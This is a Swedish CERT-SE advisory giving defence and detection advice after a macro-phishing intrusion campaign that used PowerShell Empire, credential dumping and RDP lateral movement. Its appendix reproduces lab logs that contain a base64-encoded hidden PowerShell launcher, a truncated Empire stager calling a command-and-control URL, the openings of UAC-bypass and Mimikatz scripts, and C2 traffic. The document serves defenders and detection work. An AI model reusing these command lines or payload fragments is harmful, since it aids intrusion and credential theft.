Som du ser är vår webbplats inte anpassad för äldre webbläsare. Vi rekommenderar att du uppgraderar till en nyare webbläsare.

Uppdaterad | Publicerad

CERT-SE tekniska råd med anledning av det aktuella dataintrångsfallet (B 8322-16)

CERT-SE kommer att uppdatera denna sida när vi får ny samt relevant information.

Senaste uppdatering var: 2017-09-18

CERT-SE tar tacksamt emot information om fungerande skyddsåtgärder mot eller detektering av denna typ av angrepp (dock inte om åtgärderna innefattar inköp av specifika produkter) på cert@cert.se

Sammanfattning

En stor andel av de it-angrepp som görs mot myndigheter, företag eller andra organisationer inleds av ett mejl med ett bifogat Office-dokument. Detta dokument kan exempelvis innehålla skadlig kod eller ett makro avsett att infektera mottagarens dator. Att skicka ett preparerat, skadligt dokument till ett tilltänkt offer via mejl är för en angripare en attraktiv metod då arbetsinsatsen är relativt liten ställt mot den potentiellt höga utdelningen.

Detta tillvägagångssätt var det som användes i det aktuella fallet, för att sedan röra sig vidare på nätverket.

Drabbade organisationer och privatpersoner

De drabbade har så långt som möjligt informerats av polisen. Den infrastruktur som angriparen använt är nedstängd och vi kommer därför inte ha med traditionella IOC:er i den här texten.

Angriparens tillvägagångssätt

De utförda angreppen inleddes vanligen med kartläggning av e-postadresser till anställda på den organisation som valts ut som mål. Ett eller flera mejl innehållande ett preparerat Microsoft Office-dokument skickades sedan till de anställda. Dessa mejl skickades från kapade mejlkonton eller från domäner avsedda att efterlikna legitima organisationer. Angriparen uppmanade mottagaren att tillåta makron för att kunna läsa det bifogade dokumentet. När detta skett, exekverades ett dolt PowerShell-skript vilket gav tillgång till offrets dator. Dokumenten skapades med allmänt tillgängliga verktyg för penetrationstestning (såsom Metasploit och PowerShell Empire). Efter att ha fått fotfäste i systemet använde angriparen verktyg för att öka sina rättigheter i systemet. Detta i syfte att kunna flytta sig från maskin till maskin i nätverket, dumpa lösenord och för att kunna komma åt för ändamålet intressanta system och data.

Vi har lämnat mer detaljerad information om tillvägagångsättet till polisen och den är en del av förundersökningen

Skydd och detekteringsråd per teknikområde

- Makron

- PowerShell

- Nätverkstrafik

- Antivirus

- Lateral movement samt privilegie-eskalering

- RDP

- Multi-faktor autentisering

- Annan relevant information

Makron

Att generellt, genom tekniska policyinställningar som genom Group Policys i Microsoft-miljöer kontrollera eller begränsa makron i dokument kan vara komplicerat. Många företag och organisationer använder makron i dokument för legitima arbetsuppgifter och de flesta åtgärder för att kontrollera dessa riskerar att påverka verksamheten. Inaktiverade makron kan förhindra att arbete utförs på ett effektivt sätt samt kan eventuellt skapa en negativ bild av implementerade säkerhetslösningar. Att endast tillåta makron vilka är signerade av organisationen kan vara en lösning men även i dessa fall behövs ofta undantag kunna göras när dokument skickas från externa avsändare. Vilka konkreta åtgärder som kan tas i bruk för att förbättra säkerheten runt makron varierar beroende på vilka krav verksamheten har.

I alla nyare versioner av Office finns säkerhetsinställningar för när makron får köras eller inte. Standardinställningen är att makron är inaktiverade och att användaren får en notifiering och ett val där denne kan välja att exekvera makrot eller inte. Beslutet om att köra ett potentiellt skadligt makro blir då helt upp till mottagarens bedömning och förmåga att skilja ett skadligt dokument från ett legitimt.

Några grundläggande säkerhetsåtgärder som kan minska risken för skadliga makron kan vara:

  • Om möjligt – inaktivera makron.
    Om verksamheten inte kräver makron kan möjligheten att exekvera dessa inaktiveras utan möjlighet för enskilda användare att göra undantag. I många organisationer används dock regelbundet makron.

  • Informera återkommande användare om riskerna.
    Angrepp utförda genom skadliga makron bygger generellt på att mottagaren själv i stunden avgör om ett makro får köras eller inte. Därför kan en grundläggande säkerhetsåtgärd i form av återkommande information till användare om riskerna med skadliga makron vara en bra åtgärd.

  • Implementera en säkerhetslösning för att skanna mejl och bilagor efter skadlig kod både internt och externt samt att införa en rutin för att regelbundet följa upp loggar.

  • Signerade Makron

  • Implementera en säkerhetslösning lokalt på användarnas datorer vilken kan uppfatta och blockera exekvering av skadlig kod. Även om antivirus-produkter ej kan fånga all skadlig kod så kan rätt produkt minska risken för att drabbas påtagligt.

Mer information här:

https://support.office.com/en-us/article/Enable-or-disable-macros-in-Office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6
https://technet.microsoft.com/en-us/library/cc179176.aspx
https://technet.microsoft.com/en-us/library/ff400327.aspx
https://technet.microsoft.com/en-us/library/ee857085.aspx
https://technet.microsoft.com/en-us/library/cc545900.aspx
https://technet.microsoft.com/en-us/library/cc178971.aspx

Exempel på dokument med skadligt makro. Det enda som behövs för att angreppet skall starta är att användaren lyder uppmaningen och klickar på "Aktivera innehåll"

Dokument där användaren uppmanas aktivera makro

Till toppen

PowerShell

PowerShell
Sedan runt 2012 har användandet av Microsofts skriptspråk PowerShell som verktyg vid it-angrepp konstant ökat. PowerShell har av Microsoft utvecklats till att vara en mycket kraftfullt skriptspråk avsett att administrera samtliga Windows-system. PowerShell kan exekvera dynamisk kod, nedladdad från ett annat system i minnet på den angripna datorn - utan att någon gång behöva lagras på disk. PowerShell kan även exekvera .Net-kod.

Ett vanligt problem vid utredning av intrång där PowerShell använts av angriparen är avsaknad av loggar. Med standardinställningar lämnar PowerShell i de flesta Windows-installationer få artefakter och försvårar därför påtagligt en forensisk undersökning. Enligt statistik från företaget NetMarketShare från Augusti 2017 så är Windows 7 fortfarande det mest använda operativsystemet från Microsoft. Windows 7 / Server 2008 inkluderar PowerShell version 2.0, denna version loggar som standard endast att PowerShell har körts, hur länge sessionen pågick samt om den initierades lokalt eller från en annan dator. Den bästa lösningen för detta är att uppgradera PowerShell.

Åtgärder för att få bättre kontroll över PowerShell:

  • Uppgradera PowerShell till senaste version (i skrivande stund version 5.0) och Se över de alternativ som som finns för att att logga och säkra PowerShell. Windows 7/2008 och nyare versioner av Windows har stöd för PowerShell 5.0 vilket ger större möjlighet till loggning och kontroll av PowerShell, detta kräver dock i de flesta fall en manuell uppgradering. En stark rekommendation är därför att uppgradera samtliga PowerShell-installationer till senaste version samt att konfigurera loggning. Skapa även en rutin för att regelbundet följa upp loggarna.
    Mer information om loggning av PowerShell kan läsas här:     https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

  • Implementera en central log- och övervakningslösning, vanligen benämnd som SIEM, Security Information and Event Management. En sådan lösning underlättar avsevärt möjligheten att följa upp möjliga angrepp riktade mot så väl klientdatorer som servrar och annan infrastruktur. Skapa och upprätthåll även rutiner för att regelbundet kontrollera dessa loggar.

  • Se över lösningar för att kontrollera exekvering och användning av PowerShell.

  • Att inaktivera PowerShell är i allmänhet inte ett alternativ då detta med stor sannolikhet ger problem med existerande programvara och annan funktionalitet. Ett alternativ kan vara att se över de programvaror som finns tillgängliga vilka kan ge stöd för bättre kontroll PowerShell, exempelvis genom svartlistning av specifika processer vilka inte ges tillgång till PowerShell.

  • Konfigurera windows-brandväggen till att förbjuda powershell-binären (powershell.exe, obs kan finnas multipla) från extern kommunikation

Mer information om PowerShell här:

https://blogs.msdn.microsoft.com/powershell/2013/12/16/powershell-security-best-practices/
https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
https://adsecurity.org/wp-content/uploads/2016/05/BSidesCharm-2016-PowerShellSecurity-Defending-the-Enterprise-from-the-Latest-Attack-Platform-FINAL.pdf
https://adsecurity.org/?p=2921

- Exempel PowerShell-loggar

Till toppen

Nätverkstrafik

Angriparen har i de flesta fall använts sig utav icke-standardiserade TCP-portar och det är därför möjligt att filtrera bort "normala" portar samt undersöka de som blir kvar. Det här kan göras proaktivt i brandvägg som skydd eller reaktivt genom analys av trafikflöden för detektering.
Exempel på TCP-portar som använts 444, 4444, 4488, 4443 samt 8081. En annan metod som kan användas på intern trafik för att detektera "lateral movement" är att sortera ut flöden som bryter mot det normala, till exempel klienter som kommunicerar med andra klienter.

NIDS (snort/suricata)

Exempel på signatur-träff i våran labbmiljö (emerging threat rules)
09/14/2017-10:40:22.953854 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50652 -> 37.28.155.22:8081
09/14/2017-10:41:28.776886 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50689 -> 37.28.155.22:8081
09/14/2017-10:36:20.794874 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50534 -> 37.28.155.22:8081
09/14/2017-10:41:03.545077 [] [1:2021616:2] ET TROJAN PSEmpire Checkin via POST [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 195.200.72.148:50671 -> 37.28.155.22:8081

- Exempel Nätversktrafik

Till toppen

Antivirus

Vid ett flertal tillfällen vi har analyserat har det lokala antivirusprogrammet detekterat vissa av de nerladdade verktygen (exe-filer). Vi rekommenderar därför att använda antivirusprogram, hålla det uppdaterat samt monitorera information som det genererar.

Till toppen

Lateral movement samt privilegie-eskalering

Lateral Movment
”Pass the Hash” (PtH) är en teknik för att autentisera sig med lösenordshashen i stället för med själva lösenordet. Från början användes NTLM eller LAN Manager-hashar men tekniken har utvecklats till att även innefatta Kerberos-biljetter, i dessa fall kallas tekniken ”Pass the Ticket” (PtT).
Attacken handlar om att dumpa cachade lösenordshashar eller Kerberos-biljetter ur minnet på en redan hackad maskin och sedan använda detta för vidare inloggning på andra maskiner i miljön, detta beskrivs vanligen som ”Lateral Movement”.

Attacken förutsätter att angriparen redan fått fotfäste på en maskin och därmed har flera säkerhetsåtgärder redan förbigåtts. Men det finns även i detta läge motåtgärder för vidare intrång.

Vilket skydd som finns mot PtH och PtT varierar bland annat beroende av Windows-version men några grundläggande motåtgärder listas nedan:

Till toppen

RDP

RDP är Microsofts inbyggda fjärrstyrning. I de fall RDP har varit tillåtet har angriparen använt det för "lateral movement" efter att ha tillförskansat sig användarnamn och lösenord. Agenten (boten) har etablerat en tunnel som gör att RDP-trafik har kunnat passera organisationens brandvägg. Konceptet att återanvända det som redan finns installerat brukar ofta kallas "living off the land".

- Exempel RDP-loggar

Till toppen

Multi-faktor autentisering

Då angriparen i minst ett av fallen vi undersökt har kommit över och använt sig av ett legitimt VPN-konto vill vi rekomendera att samtliga Internettjänster där så är möjligt använder sig av multi-faktor autentisering. Till exempel VPN och webbmejl.

https://en.wikipedia.org/wiki/Multi-factor_authentication

Annan relevant information

Här har vi samlat annan information som är relevant för att detektera eller skydda sig mot den här typen av angrepp.

WMI

https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html

PowerShell

https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
http://www.redblue.team/2015/09/triaging-powershell-exploitation-with.html

Lateral movement

https://technet.microsoft.com/en-us/dn785092.aspx (lateral movement, pth)

Vårat labb

Bygger på instruktioner här: https://adsecurity.org/?p=2653 men är vidare utformat efter en av de drabbade organisationerna för att ge realistiska scenarion.

Till toppen

Exempel PowerShell-loggar

Samtliga loggar är skapade i våran labbmiljö men efterliknar så långt som möjligt de verkliga dataintrången.

Log Name:      Windows PowerShell
Source:        PowerShell   <--
Date:          2017-09-13 12:42:55
Event ID:      600
Task Category: Provider Lifecycle
Level:         Information
Keywords:      Classic
User:          N/A
Computer:      pongo.hominidae.org
Description:
Provider "Registry" is Started.

Details: 
ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=ConsoleHost
HostVersion=5.0.10240.16384
HostId=40450d09-ea1c-4173-a6a9-10129da4d73f

<-- Base64-kodat powershell-skript

HostApplication=powershell -NoP -sta -NonI -W Hidden -Enc                   JABXAEMAPQBOAGUAVwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEA(truncated)...
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Log Name:      Windows PowerShell
Source:        PowerShell   <---
Date:          2017-09-13 12:42:57
Event ID:      800
Task Category: Pipeline Execution Details   <--
Level:         Information
Keywords:      Classic
User:          N/A
Computer:      pongo.hominidae.org
Description:

<-- Powershell-Empire-Agent

Pipeline execution details for command line: fuNCtioN STARt-NeGOtIATE{param($s,$SK,$UA="lol")ADd-TYPe             -aSSembly SYSTEM.SEcURITy;Add-TypE -AsSEMBLY SYstem.COre;$ErrorActionPreference = "SilentlyContinue";$E=
(truncated)... 
Start-Negotiate -s "http://37.28.155.22:8081/" -SK 't[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v' -UA $u;.

Context Information: 
DetailSequence=1
DetailTotal=1

SequenceNumber=15

UserId=HOMINIDAE\apan.apansson
HostName=ConsoleHost
HostVersion=5.0.10240.16384
HostId=40450d09-ea1c-4173-a6a9-10129da4d73f
HostApplication=powershell -NoP -sta -NonI -W Hidden -Enc JABXAEMAPQBOAGUAVwAtAE8AQgBqAEUAQwBUACAAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABh(truncated)...
EngineVersion=5.0.10240.16384
RunspaceId=3f268116-7d77-441e-b766-18bae86a262c
PipelineId=1
ScriptName=
CommandLine=fuNCtioN STARt-NeGOtIATE{param($s,$SK,$UA="lol")ADd-TYPe -aSSembly SYSTEM.SEcURITy;Add-TypE     -AsSEMBLY   (truncated)
Start-Negotiate -s "http://37.28.155.22:8081/" -SK 't[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v' -UA $u;

Details: 
CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="AssemblyName"; value="SYSTEM.SEcURITy"

Log Name:      Windows PowerShell
Source:        PowerShell   <--
Date:          2017-09-13 12:51:26
Event ID:      600
Task Category: Provider Lifecycle
Level:         Information
Keywords:      Classic
User:          N/A
Computer:      pongo.hominidae.org
Description:
Provider "Registry" is Started.

Details: 
ProviderName=Registry
NewProviderState=Started

SequenceNumber=1

HostName=MSFConsole <--
HostVersion=0.1
HostId=500e57c5-f16a-4901-b401-1f3413ea3b46
HostApplication=TEST.exe    <-- EXE-fil som körs via powershell
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=

Log Name:      Microsoft-Windows-PowerShell/Operational <--
Source:        Microsoft-Windows-PowerShell
Date:          2017-09-13 12:42:57
Event ID:      4104
Task Category: Execute a Remote Command
Level:         Warning
Keywords:      None
User:          HOMINIDAE\apan.apansson
Computer:      pongo.hominidae.org
Description:

<--  Powershell-Empire-Agent

Creating Scriptblock text (1 of 1):
fuNCtioN STARt-NeGOtIATE{param($s,$SK,$UA="lol")ADd-TYPe -aSSembly SYSTEM.SEcURITy;Add-TypE -AsSEMBLY     SYstem.COre;(truncated)...
Start-Negotiate -s "http://37.28.155.22:8081/" -SK 't[$pE{.|DynG}#%@&u1o?(U4Sgskw`_v' -UA $u;

ScriptBlock ID: b994a9d4-7f3c-46b8-8cf4-8f36d7f2312f
Path:

Log Name:      Microsoft-Windows-PowerShell/Operational <--
Source:        Microsoft-Windows-PowerShell
Date:          2017-09-13 12:42:58
Event ID:      4104
Task Category: Execute a Remote Command
Level:         Warning
Keywords:      None
User:          HOMINIDAE\apan.apansson
Computer:      pongo.hominidae.org
Description:
Creating Scriptblock text (1 of 3):

<-- (starten på) Invoke-Empire

function Invoke-Empire {
param(
    [Parameter(Mandatory=$true)]
    [String]
    $SessionKey,
    (truncated)... 
()).TransformFinalBlock($bytes, 0, $bytes.Length);
    $hmac = New-Object System.Security.Cryptography.HMACSHA1;
    $hmac.Key = $encoding.GetBytes($SessionKey);
    $ciphertext + $hmac.Com

ScriptBlock ID: 75618e4c-39a1-4261-b5eb-2cb1ec923c20
Path:

Log Name:      Microsoft-Windows-PowerShell/Operational <--
Source:        Microsoft-Windows-PowerShell
Date:          2017-09-13 12:54:38
Event ID:      4104
Task Category: Execute a Remote Command
Level:         Warning
Keywords:      None
User:          HOMINIDAE\apan.apansson
Computer:      pongo.hominidae.org
Description:
Creating Scriptblock text (1 of 33):

<-- (starten på) Invoke-BypassUAC (privesc)

function Invoke-BypassUAC
{
    [CmdletBinding()]
    param(
    [Parameter(Mandatory = $False)]
    [string]
    (truncated)...
+gJihABCD4A/rAjPAD76EwbihABBqB8H4BFmJhYz9//87wQ+HIAoAAP8khaU0ABCDjej9////ibWI/f//ibW8/f//ibXI/f//ibXM        /f//ibXw/f/

ScriptBlock ID: f62ebd67-1727-45d2-aa63-b1678ce35f47
Path:

Log Name:      Microsoft-Windows-PowerShell/Operational <--
Source:        Microsoft-Windows-PowerShell
Date:          2017-09-13 12:56:04
Event ID:      4104
Task Category: Execute a Remote Command
Level:         Warning
Keywords:      None
User:          HOMINIDAE\apan.apansson
Computer:      pongo.hominidae.org
Description:
Creating Scriptblock text (1 of 73):

<-- (starten på) Invoke-Mimikatz (lösenordsdump)

function Invoke-Mimikatz
{
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Parameter(Position = 0)]
(truncated)...      
$TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
    $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') |

ScriptBlock ID: e72fb473-50ca-4853-8450-9f376bfabfb4
Path:

Till toppen

Exempel Nätversktrafik

Samtliga loggar är skapade i våran labbmiljö men efterliknar så långt som möjligt de verkliga dataintrången.

Denna "logg" är en follow_tcp_flow i wireshark mellan en installerad agent (bot) och den emulerade angriparens command & control.

GET /index.asp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 37.28.155.22:8081
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5 
Date: Thu, 14 Sep 2017 08:21:14 GMT

2.j.1.A2d*:&.W..c.^;Vi.Q(....
wR.w.#.W
).DL+.O.ig1uBkQ.QsJ.8..2..".#.(z.   W=..Vw  r.
.{Lx`*76KZ!,%.6F<<[}%7-+
S`J.cN.*MZ:F.........=A. .M.dDNe.JI%H.].|G;@:   ..U[{.I.w)6/K1j-+?  
`.e:U&Qo..i& (>)dR5.wM.>yQ.;$..w.._.e*R..Q.2!.#9q5&"t.
.|=417i<fV.t.A;P{0f%.0.'2..=.a"~_g*dDN..zq%{U.A..`.s.S,2.r$5.@?([.?+, 3]..{.4t<.e:P6ZQ(5#}MT.e5.Ue.=DJ"Sd@4d.E
L.qg.NHKS!.%Z.rPx[
5.BJ$.S.}.;t..g7^6$.K$9,"1.
# 8[.

7i>Q\0r.v=~X=m}$..'.
.9>P.7(.X'*.i;od.UU.O.K&D}!.
...[.4VP.(W....i.FF5T.e..k.M.3<.%..>-ug..+\3.0*".ei!a.lU.}.q.&0.>.:=1"w$
kG`+.g@.k%QX~-UM6`s4
.#..X'>G...Z.j:..
WJ't4a'F..g.$.2'4.%1    r.&.~.+/'.8Q.mg'V.Rm.@.. .WRoBLw..6..X62Sc.p..I-|#l|'].     [O1!..1r.T7F.RjHX;;lW.G6YBpJ.q0..,.4r$5.@.([.1%.NuK^.do1.G.i.w."5,?+.;:.v#..x+. 4vO..u.B    V.sqf.G^!.)1VS|
Ka2LA`<@.8WG.r.bG.Z..hC.    JD. _.e5.Um..8..8mF2..E m.|..5.%.&....m...l0+.%oYJGl.Y..}..Q...#^[6.\vj..[
..P.c
@..c...]B.w'G.2....Z.a$k,k..5'".w.dQ..?MG
msZS0$.,.16
>...+!;<",V`.r(.UxM!g
....7..$)k(.S.G`.-i-qj8.[r.zL.Z'...$@bV/.].1>cR
.:i>Q@.c;E.~d.U0..6MZ..2.Q.18|. . 3.bi.....\..Q2....N...s.%6.\Q...) .       ds4.T._6.......,X5?@Xg8A./..eQ.v.u&x qa.    w.7I^[{..,.T2..)4..&.gD4G]...
<Z7..E../TXyt?./.P`..nF.a..QtAxM!g..:.0H{..u`.. W,0QJ5.T    d`4]<z.|.w.....bR...@kU.!dT.(4m.g.Qz
f.qP6<B[YN{21uH5..Z..YC-.Jk`.R
K~m.    ."$F8"..7/.#<(z9)W=.>vW)R,.,MQ.@<..*'..X5>W3."^(+*+5.jf.v'^.vl.FhC:=W].-."P5.[.RjK[r]_..c..=~F.    {>G^.8...Tj.Ka:k/j4.#....d6.T...q.I8..]{.Z.A...Z.7QJ,.Z.{.Qp*l..bsZSO>6dR.f.#n\R[o"+)+JW.h.T!Kuo...693/27.5j....    [8^E.8MS)T:_.zf!ii]&..2.79..W9\.'..8./lK-c;E2...u0/:....;.`..xSI.)0N..M.ry;t.hG.....;#.-5.5B...    \=0.!).tM.t.JK`..d.#..23,...A. 8Z\i<.7.mA`o%p+{z0g NHO...KT._T1)[.y]..M~.d@4].Z.qd.<W.Y,:83.LPh7z\r$U.;..do%.BPZu...].%).^]{  .4[ [mY.c4s.g.[.A..e..\W.\]}
P2TR~_gWy^.`V.b.RXf.Vg.^..'K ).EF.k..)o.-.)..Pq%K\.!~e.. 7...Hx
Sr.@.@G.lQ5..UL2I.\
Q\..i2....>..r
$*7A.!.Fn].@1.WB.L\0YqN.O.KbQ..V. \S.(
.g..L`
H.MC
u.{< ...-.."
 7.@.-  .+StL.B.F.oZ<Z0..
.=.-'>G.7.Z.j)...@L0G..8VF1[$.:...+.."yJ.<K....5.MQh.\.&La;f<..C,3:..)M.<U~.-.
.
BInq._.P_&v&...>.
..>yPg:J.-..4   QD4I..FB..  .4
8#%.X02E..4}.
:=i-qJ.C&b2...q'$.9%%1.$    k...}TmBJ.V..<.^...x.[...89!2._|XWn_`R
.Uc...}.RMH..u..4%..3.9..e. ..,./...Jj..8p%PZn.:.AVS.q..    /F)1.}T`0G|Yfgr.Qx9...q.I092!+.1.g"..Z36QGi)qd.U.^.Rn<Z2+1...4^P.fBiK.X-.\i1fk'R=.T._6.......,X5?@Xg.].6T/ .MQb
Qd...qF2.NO..q#.7K.!?O.%QJ4V.L.B.IAO@%..E#$$4}ZP>FBl@
=.*S    .t..D?t,k..M 36&Y3.5.   m..Um.. .(.qd.N,..Z{.f
..$$.
..8A 7.X. <<|Yb`..8^.Z.ww.$QPS) VI{....uLjW_r ...c&.$zQh.6I4.#"&..(.T.>wU.]/..
l..H.Kv~n}.?SO_;..'/A=k/K..W+).LA   H.lU.i.w..],.4.".2J7m[
T`8+.S`w.G.T+Zk.M#3.9_Iq"&.j...\1.. &.ai.e>.KmI.obQ]ES2>!Z.a>./F!hIBc.brnj0_(K`x.eNZB^[{71..T..b..]=u@.K5J9
Khkh.=.?.LD:4Ff..0.BG`+/.@.K5J9
Kv~h.=2?'LD..I.J.   7.X-DJ)(OI{..s]...A?.H00#.LN.k.).M(lPU..UJ+CXt.OA'QsJ ...:..{dXm_]\i
.+.W.b  W.4..{..G^..    1VVt.YeV}.7
.(.h@9.QZ
F.xg6......2T.m4eVk.+..gYFU/E.
..{!U!.^%..0..:P.eV]\f..3
.
o.B.]..d.fIAYMXoNEt.Ph(e\c
5c
f^nZ1H.xUv..A.Z._w#@.C...N#2^Nj(b.dSNGET /index.asp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 37.28.155.22:8081
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: Microsoft-IIS/7.5 
Date: Thu, 14 Sep 2017 08:21:14 GMT

2.j.1.A2d*:&.W..c.^;Vi.Q(....
wR.w.#.W
).DL+.O.ig1uBkQ.QsJ.8..2..".#.(z.   W=..Vw  r.
.{Lx`*76KZ!,%.6F<<[}%7-+
S`J.cN.*MZ:F.........=A. .M.dDNe.JI%H.].|G;@:   ..U[{.I.w)6/K1j-+?  
`.e:U&Qo..i& (>)dR5.wM.>yQ.;$..w.._.e*R..Q.2!.#9q5&"t.
.|=417i<fV.t.A;P{0f%.0.'2..=.a"~_g*dDN..zq%{U.A..`.s.S,2.r$5.@?([.?+, 3]..{.4t<.e:P6ZQ(5#}MT.e5.Ue.=DJ"Sd@4d.E
L.qg.NHKS!.%Z.rPx[
5.BJ$.S.}.;t..g7^6$.K$9,"1.
# 8[.

7i>Q\0r.v=~X=m}$..'.
.9>P.7(.X'*.i;od.UU.O.K&D}!.
...[.4VP.(W....i.FF5T.e..k.M.3<.%..>-ug..+\3.0*".ei!a.lU.}.q.&0.>.:=1"w$
kG`+.g@.k%QX~-UM6`s4
.#..X'>G...Z.j:..
WJ't4a'F..g.$.2'4.%1    r.&.~.+/'.8Q.mg'V.Rm.@.. .WRoBLw..6..X62Sc.p..I-|#l|'].     [O1!..1r.T7F.RjHX;;lW.G6YBpJ.q0..,.4r$5.@.([.1%.NuK^.do1.G.i.w."5,?+.;:.v#..x+. 4vO..u.B    V.sqf.G^!.)1VS|
Ka2LA`<@.8WG.r.bG.Z..hC.    JD. _.e5.Um..8..8mF2..E m.|..5.%.&....m...l0+.%oYJGl.Y..}..Q...#^[6.\vj..[
..P.c
@..c...]B.w'G.2....Z.a$k,k..5'".w.dQ..?MG
msZS0$.,.16
>...+!;<",V`.r(.UxM!g
....7..$)k(.S.G`.-i-qj8.[r.zL.Z'...$@bV/.].1>cR
.:i>Q@.c;E.~d.U0..6MZ..2.Q.18|. . 3.bi.....\..Q2....N...s.%6.\Q...) .       ds4.T._6.......,X5?@Xg8A./..eQ.v.u&x qa.    w.7I^[{..,.T2..)4..&.gD4G]...
<Z7..E../TXyt?./.P`..nF.a..QtAxM!g..:.0H{..u`.. W,0QJ5.T    d`4]<z.|.w.....bR...@kU.!dT.(4m.g.Qz
f.qP6<B[YN{21uH5..Z..YC-.Jk`.R
K~m.    ."$F8"..7/.#<(z9)W=.>vW)R,.,MQ.@<..*'..X5>W3."^(+*+5.jf.v'^.vl.FhC:=W].-."P5.[.RjK[r]_..c..=~F.    {>G^.8...Tj.Ka:k/j4.#....d6.T...q.I8..]{.Z.A...Z.7QJ,.Z.{.Qp*l..bsZSO>6dR.f.#n\R[o"+)+JW.h.T!Kuo...693/27.5j....    [8^E.8MS)T:_.zf!ii]&..2.79..W9\.'..8./lK-c;E2...u0/:....;.`..xSI.)0N..M.ry;t.hG.....;#.-5.5B...    \=0.!).tM.t.JK`..d.#..23,...A. 8Z\i<.7.mA`o%p+{z0g NHO...KT._T1)[.y]..M~.d@4].Z.qd.<W.Y,:83.LPh7z\r$U.;..do%.BPZu...].%).^]{  .4[ [mY.c4s.g.[.A..e..\W.\]}
P2TR~_gWy^.`V.b.RXf.Vg.^..'K ).EF.k..)o.-.)..Pq%K\.!~e.. 7...Hx
Sr.@.@G.lQ5..UL2I.\
Q\..i2....>..r
$*7A.!.Fn].@1.WB.L\0YqN.O.KbQ..V. \S.(
.g..L`
H.MC
u.{< ...-.."
 7.@.-  .+StL.B.F.oZ<Z0..
.=.-'>G.7.Z.j)...@L0G..8VF1[$.:...+.."yJ.<K....5.MQh.\.&La;f<..C,3:..)M.<U~.-.
.
BInq._.P_&v&...>.
..>yPg:J.-..4   QD4I..FB..  .4
8#%.X02E..4}.
:=i-qJ.C&b2...q'$.9%%1.$    k...}TmBJ.V..<.^...x.[...89!2._|XWn_`R
.Uc...}.RMH..u..4%..3.9..e. ..,./...Jj..8p%PZn.:.AVS.q..    /F)1.}T`0G|Yfgr.Qx9...q.I092!+.1.g"..Z36QGi)qd.U.^.Rn<Z2+1...4^P.fBiK.X-.\i1fk'R=.T._6.......,X5?@Xg.].6T/ .MQb
Qd...qF2.NO..q#.7K.!?O.%QJ4V.L.B.IAO@%..E#$$4}ZP>FBl@
=.*S    .t..D?t,k..M 36&Y3.5.   m..Um.. .(.qd.N,..Z{.f
..$$.
..8A 7.X. <<|Yb`..8^.Z.ww.$QPS) VI{....uLjW_r ...c&.$zQh.6I4.#"&..(.T.>wU.]/..
l..H.Kv~n}.?SO_;..'/A=k/K..W+).LA   H.lU.i.w..],.4.".2J7m[
    T`8+.S`w.G.T+Zk.M#3.9_Iq"&.j...\1..     &.ai.e>.KmI.obQ]ES2>!Z.a>./F!hIBc.brnj0_(K`x.eNZB^[{71..T..b..]=u@.K5J9
Khkh.=.?.LD:4Ff..0.BG`+/.@.K5J9
Kv~h.=2?'LD..I.J.   7.X-DJ)(OI{..s]...A?.H00#.LN.k.).M(lPU..UJ+CXt.OA'QsJ ...:..{dXm_]\i
.+.W.b  W.4..{..G^..    1VVt.YeV}.7
.(.h@9.QZ
F.xg6......2T.m4eVk.+..gYFU/E.
..{!U!.^%..0..:P.eV]\f..3
.
o.B.]..d.fIAYMXoNEt.Ph(e\c
5c
f^nZ1H.xUv..A.Z._w#@.C...N#2^Nj(b.dSN

"PCAP or it didn't happen"https://drive.google.com/open?id=0B7pTM0QU5apSdnF0Znp1Tko0ams

Exempel RDP-loggar

Samtliga loggar är skapade i våran labbmiljö men efterliknar så långt som möjligt de verkliga dataintrången.

Log Name:      Security
Source:        Microsoft-Windows-Security-Auditing
Date:          2017-09-13 12:50:10
Event ID:      4624 <--
Task Category: Logon    <--
Level:         Information
Keywords:      Audit Success
User:          N/A
Computer:      pongo.hominidae.org
Description:
An account was successfully logged on.

Subject:
Security ID:        SYSTEM
Account Name:       PONGO$  <-- Datorkonto
Account Domain:     HOMINIDAE
Logon ID:       0x3E7

Logon Information:
Logon Type:     10  <--- RDP
Restricted Admin Mode:  No
Virtual Account:    No
Elevated Token:     Yes

Impersonation Level:        Impersonation

New Logon:
Security ID:        HOMINIDAE\apan.apansson
Account Name:       apan.apansson   <-- konto som används
Account Domain:     HOMINIDAE
